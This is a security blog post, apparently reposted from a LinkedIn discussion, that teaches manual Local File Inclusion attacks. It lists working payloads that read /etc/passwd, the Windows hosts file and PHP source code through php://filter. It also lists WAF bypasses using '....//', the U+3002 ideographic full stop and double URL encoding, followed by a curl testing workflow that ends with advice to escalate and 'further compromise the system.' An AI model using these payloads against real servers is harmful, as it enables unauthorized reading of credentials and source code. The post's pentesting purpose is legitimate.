Unmasking the Manual LFI Bypass: Beyond Automated Scanners

Listen to this Post

Featured Image

Introduction:

Local File Inclusion (LFI) vulnerabilities remain a critical threat, allowing attackers to read sensitive files on a server. While automated tools are ubiquitous, this analysis delves into a real-world scenario where manual techniques, including sophisticated encoding bypasses, were the key to success, highlighting the limitations of pure automation in modern web application security.

Learning Objectives:

  • Understand the core mechanism of a basic LFI vulnerability and a common path traversal bypass.
  • Learn advanced manual techniques for bypassing Web Application Firewalls (WAFs) using Unicode and character encoding.
  • Develop a methodology for manual testing that complements automated security tools.

You Should Know:

1. The Fundamental LFI and Path Traversal Bypass

The classic LFI payload attempts to read the `/etc/passwd` file on a Linux system. A common filter blocks the sequence ../. A well-known manual bypass is to use a double URL-encode or the pattern ....//. When the filter naively removes `../` from ....//, it leaves behind a new ../,

http://vulnerable-site.com/index.php?page=....//....//....//....//etc/passwd

Step-by-step guide:

  1. Identify the Parameter: Find a page parameter (e.g., ?page=about.php).
  2. Test Basic LFI: Try ?page=../../../etc/passwd. If blocked, proceed.

3. Apply the Bypass: Use the payload `?page=….//….//….//….//etc/passwd`.

  1. Observe the Result: The application’s filter may strip the `../` from the center of ....//, which recreates the traversal sequence, allowing you to break out of the web root directory.

2. Bypassing WAFs with Unicode Normalization

Web Application Firewalls (WAFs) often block requests containing plaintext `../` sequences. However, they can be evaded using Unicode characters that normalize to standard dots or slashes. As commented by security experts, the Chinese Ideographic Full Stop (U+3002) is a potent alternative.

http://vulnerable-site.com/index.php?page=%E3%80%82%E3%80%82/%E3%80%82%E3%80%82/%E3%80%82%E3%80%82/etc/passwd

Step-by-step guide:

  1. Understand the Character: The character `。` (U+3002) is a full-width stop used in Chinese, Japanese, and Korean writing.
  2. Craft the Payload: Replace each dot (.) in your traversal sequence with `%E3%80%82` (the URL-encoded form of U+3002).
  3. Send the Request: The server-side application, during its normalization process, might convert this Unicode character back to a standard dot, effectively executing the traversal after the WAF has already passed the payload.

3. Exploiting with Cyrillic Characters

Similar to the Unicode bypass, using characters from other alphabets like Cyrillic can confuse filters. The Cyrillic capital letter ‘a’ (U+0430) can sometimes be used, though it’s more commonly employed in Cross-Site Scripting (XSS). The principle remains: use visually similar, but technically different, characters.

http://vulnerable-site.com/index.php?page=。。//。。//。。//etc/passwd

Step-by-step guide:

  1. Identify Homoglyphs: Find characters that look like `/` or `.` but have different Unicode code points.
  2. Test in Context: Manually test these characters in the vulnerable parameter. For instance, directly input `。。//` (using the U+3002 character).
  3. Observe Server Behavior: If the server’s parsing logic is vulnerable, it will interpret these characters as their ASCII equivalents, successfully performing the directory traversal.

4. Verifying LFI with Windows File Access

LFI is not exclusive to Linux. On Windows servers, the goal is to read files like `boot.ini` or the Windows hosts file.

http://vulnerable-site.com/index.php?page=....//....//....//windows/system32/drivers/etc/hosts

Step-by-step guide:

  1. Confirm Server OS: Determine if the server is running Windows (often through banner grabbing or error messages).
  2. Craft Windows Payload: Use the same bypass techniques but target Windows-specific files.
  3. Execute and Read: The successful payload will return the contents of the specified Windows file, confirming the vulnerability.

5. Advanced Encoding: Double URL Encoding

If a WAF performs a single decode, double encoding can sneak a payload through. The forward slash (/) is encoded as %2F. Double-encoded, it becomes %252F.

http://vulnerable-site.com/index.php?page=..%252F..%252F..%252Fetc%252Fpasswd

Step-by-step guide:

  1. Encode the Payload: Start with the basic payload: ../../../etc/passwd.

2. First Encoding: URL encode it once: `..%2F..%2F..%2Fetc%2Fpasswd`.

  1. Second Encoding: URL encode the percent signs from the first encoding: ..%252F..%252F..%252Fetc%252Fpasswd.
  2. Send the Request: The WAF may see `%252F` and not recognize it as a slash. The application server, however, might decode it twice, turning `%252F` back into `/` and executing the traversal.

6. Using PHP Wrappers for LFI to RCE

A critical escalation of LFI is using PHP filters to read source code or convert LFI into Remote Code Execution (RCE).

http://vulnerable-site.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

Step-by-step guide:

  1. Identify PHP: Confirm the application is built with PHP.
  2. Use the PHP Wrapper: The `php://filter` wrapper allows you to process the data of a file through a filter before it is read.
  3. Base64 Encode the Resource: Using `convert.base64-encode` prevents the file from being rendered as HTML/PHP and allows you to read the raw, base64-encoded source code.
  4. Decode the Output: Take the base64 output from the response and decode it to reveal the application’s source code, which may contain database credentials or other sensitive logic.

7. The Ultimate Manual Testing Methodology

This final section consolidates the commands into a manual testing workflow.

 1. Basic Check
curl -s "http://site.com/page?file=../../../etc/passwd"

<ol>
<li>Common Bypass
curl -s "http://site.com/page?file=....//....//....//etc/passwd"</p></li>
<li><p>Unicode Bypass (using curl with URL-encoded U+3002)
curl -s "http://site.com/page?file=%E3%80%82%E3%80%82/%E3%80%82%E3%80%82/%E3%80%82%E3%80%82/etc/passwd"</p></li>
<li><p>Double Encoding Bypass
curl -s "http://site.com/page?file=..%252F..%252F..%252Fetc%252Fpasswd"</p></li>
<li><p>PHP Wrapper for Source Code Disclosure
curl -s "http://site.com/page?file=php://filter/convert.base64-encode/resource=index.php" | base64 --decode

Step-by-step guide:

  1. Reconnaissance: Use `curl` or Burp Suite to probe the target parameter.
  2. Iterate: Systematically try each bypass method, starting from the simplest to the most complex.
  3. Automate Manually: Use command-line tools to quickly test multiple payloads, but analyze each response manually to understand the application’s filtering logic.
  4. Escalate: Once file read is confirmed, attempt to read source code or configuration files to further compromise the system.

What Undercode Say:

  • Automation is an Assistant, Not a Replacement. The initial post highlights that automated scripts failed, forcing a manual, thoughtful approach that succeeded. Tools can find low-hanging fruit, but advanced vulnerabilities require human intuition and adaptability.
  • The Evasion Arsenal is Rich and Evolving. The comments reveal a crucial insight: security professionals maintain a mental database of evasion techniques, from Chinese ideographic points to Cyrillic characters. This knowledge of how different systems parse and normalize input is what truly breaks through modern defenses.

The analysis of this single LinkedIn post underscores a significant trend in offensive security. As defenses become more automated, the offense must become more creative. The dialogue between the original poster and the commenter exemplifies the collaborative nature of the security community, where sharing a single, successful technique (like using U+3002) can instantly arm thousands of practitioners against a common control. This continuous cycle of technique development and sharing is what pushes the entire field forward, proving that the human element remains the most critical factor in cybersecurity.

Prediction:

The future of LFI and similar injection attacks will see an increased arms race between AI-powered WAFs and AI-assisted hacking tools. However, the core weakness—inconsistent parsing and normalization between security layers and the application itself—will persist. We predict a rise in “semantic bypasses” that exploit differences in how machine learning models and the target application interpret ambiguous or multi-encoded inputs. The manual hunter’s deep understanding of character encoding, protocol quirks, and application logic will become even more valuable, ultimately ensuring that human expertise remains the ultimate weapon in both attacking and defending digital assets.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Edeclerck Lfi – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky